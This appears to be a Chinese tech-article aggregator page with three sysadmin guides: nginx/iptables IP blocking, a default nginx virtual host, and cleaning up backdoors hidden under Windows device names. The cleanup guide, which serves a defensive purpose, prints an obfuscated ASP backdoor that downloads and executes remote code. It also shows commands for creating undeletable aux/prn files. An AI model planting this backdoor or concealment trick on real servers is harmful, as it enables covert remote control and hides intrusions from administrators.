Nginx+iptables屏蔽访问Web页面过...-为nginx设置默认虚拟主机（空...-com1/lpt1/prn/nul 木马后门处理方法集合

当前位置: 操作系统/服务器>linux

本页文章导读:

▪Nginx+iptables屏蔽访问Web页面过于频繁的IP(防DDOS，恶意访问，采集器) 脚本如下: 代码如下: #!/bin/sh nginx_home = /Data/app_1/nginx log_path = /Data/logs /usr/bin/tail -n50000 $log_path/access.log \ |awk ‘$8 ~/aspx/{print $2,$13}' \ |grep -i -v -E “google|yahoo|baidu|msnbot|FeedSky|sogou” \ |awk ‘{prin.........

▪为nginx设置默认虚拟主机（空主机头，默认主机头）最关键的一点事，在server的设置里面添加这一行： listen 80 default; 后面的default参数表示这个是默认虚拟主机。这个设置非常有用。比如别人通过ip或者未知域名访问你的网站的时候，你希.........

▪com1/lpt1/prn/nul 木马后门处理方法集合删除命令 rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F 代码如下: <% 'by*aming dim amxml,amtxt,amado amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"."&"z"&"h"&"-"&"c"&"n"&"."&.........

[1]Nginx+iptables屏蔽访问Web页面过于频繁的IP(防DDOS，恶意访问，采集器)

来源: 互联网发布时间: 2013-12-24

脚本如下:

代码如下:

#!/bin/sh
nginx_home = /Data/app_1/nginx
log_path = /Data/logs
/usr/bin/tail -n50000 $log_path/access.log \
|awk ‘$8 ~/aspx/{print $2,$13}' \
|grep -i -v -E “google|yahoo|baidu|msnbot|FeedSky|sogou” \
|awk ‘{print $1}'|sort|uniq -c |sort -rn \
|awk ‘{if($1>150)print “deny “$2″;”}'> $nginx_home/conf/vhosts/blockip.conf
/bin/kill -HUP `cat $nginx_home/nginx.pid`

也可以通过分析nginx日志过滤出频繁访问IP，直接用iptables屏蔽这个IP，就用不着重启nginx了，并且屏蔽效果更好。

单个IP的命令是
iptables -I INPUT -s 124.115.0.199 -j DROP

封IP段的命令是
iptables -I INPUT -s 124.115.0.0/16 -j DROP

封整个段的命令是
iptables -I INPUT -s 194.42.0.0/8 -j DROP

封几个段的命令是
iptables -I INPUT -s 61.37.80.0/24 -j DROP
iptables -I INPUT -s 61.37.81.0/24 -j DROP

刚才不小心搞的自己都连不上了-_-!!!
iptables -I INPUT -p tcp –dport 80 -s 124.115.0.0/24 -j DROP
以后用这种只封80端口就行了，不会出问题!

iptables -I INPUT -p tcp –dport 80 -s 124.115.0.0/24 -j DROP

iptables -I INPUT -s 61.37.81.0/24 -j DROP

解封
iptables -F
清空
iptables -D INPUT 数字

[2]为nginx设置默认虚拟主机（空主机头，默认主机头）

来源: 互联网发布时间: 2013-12-24

最关键的一点事，在server的设置里面添加这一行：
listen 80 default;
后面的default参数表示这个是默认虚拟主机。

这个设置非常有用。
比如别人通过ip或者未知域名访问你的网站的时候，你希望禁止显示任何有效内容，可以给他返回500.
目前国内很多机房都要求网站主关闭空主机头，防止未备案的域名指向过来造成麻烦。就可以这样设置：

代码如下:

server {
listen 80 default;
return 500;
}

也可以把这些流量收集起来，导入到自己的网站，只要做以下跳转设置就可以：

代码如下:

server {
listen 80 default;
rewrite ^(.*) http://www. permanent;
}

[3]com1/lpt1/prn/nul 木马后门处理方法集合

来源: 互联网发布时间: 2013-12-24

删除命令

rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F

代码如下:

<%
'by*aming
dim amxml,amtxt,amado
amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&"/"&"b"&"o"&"t"&"/"&"c"&"o"&"n"&"f"&"i"&"g"&"."&"t"&"x"&"t"
Set amxml=CreateObject("Microsoft.XMLHTTP")
amxml.Open "Get",amtxt,False,"",""
amxml.setRequestHeader "User-Agent",amtxt
amxml.Send
set amado=Server.CreateObject("adodb.stream")
amado.Type=1
amado.Mode=3
amado.Open
amado.Write amxml.ResponseBody
amado.Position=0
amado.Type=2
amado.Charset="gb2312"
execute(amado.ReadText)
amado.Close
set amado=nothing
Set amxml=nothing
%>

近期有朋友发现自己的网站目录下多出许多类似 aux.asp com1.gupiao.asp 的文件或文件夹，无法删除！这类文件为何无法删除，怎样建立无法删除的文件，又如何删除 aux.asp 这类无法删除的文件呢？

在服务器中文件夹选项 - 查看 -隐藏受保护的操作系统文件后可看到此类文件属性均为RHSA系统文件，无法删除、修改、移动。

Windows 下不能够以下面这些字样来命名文件/文件夹，包括：aux、com1、com2、prn、con、nul 等，因为这些名字都属于设备名称，等价于一个 DOS 设备，如果我们把文件命名为这些名字，Windows 就会误以为发生重名，所以会提示“不能创建同名的文件”。

当然，有一些特殊的方法可以投机取巧，建立以这些设备名为名的文件夹，比如我们在命令提示符下执行“md E:\COM1\\”，就在E盘建了一个名叫 COM1 的文件夹。此文件夹虽然可以访问，也可以建立子文件夹，但却无法删除，在系统看来，这个 COM1文件夹就是设备。
那么，如何删除aux、com1等文件/文件夹呢？我们只要按照完整的 UNC 路径格式，就是网上邻居的路径格式，正确输入文件路径及文件名即可。比如要删除E 盘下的 aux 文件夹，可在命令提示符下执行：rd /s \\.\E:\aux，rd 带上/s 参数表示从所有子目录删除指定文件。再比如要删除 E 盘 aux文件夹下的 nul.exe 文件，在命令提示符下执行：del \\.\E:\aux\nul.exe 即可。

采用del \\.\E:\PRN\aux.asp:.jpg的方式，失败了，最后将其他jpg文件移走，使用rd方式删除整个目录看图：

删除aux文件命令

注意尾部加“\\”不然会出现正常文件夹也出现如图中的1文件夹无法访问的情况，重启后文件夹才会消失。

其他这种文件的删除特殊文件资料。

可以在dos中删除,在开始输入以下命令:

下面是删除test用户中的null目录中所有内容

echo y|rmdir \\.\D:\freehost\test\web\nul /s

如果有一些特殊文件,如aux.com.asp无法删除,只能先备份用户的web目录(备份时不要选中有问题的文件),再用以下命令删除web目录所有内容:

echo y|rmdir \\.\D:\freehost\test\web /s

要建立这类无法删除文件的方法也很简单：

copy 123.txt \\.\d:\aux.asp

建立不可删除的文件夹：

md \\.\d:\prn\\

要删除这类‘无法删除的文件'也是有办法的，如：d:\wwwroot\web\www 是包含这些无法删除文件的目录。在执行命令前，把文件夹中需要备份的程序先移动到其他位置，然后使用以下命令可以删除。

rmdir \\.\d:\wwwroot\web\www /s /q

也可以使用下面的命令直接删除这些文件：

del \\.\d:\wwwroot\web\www\aux.asp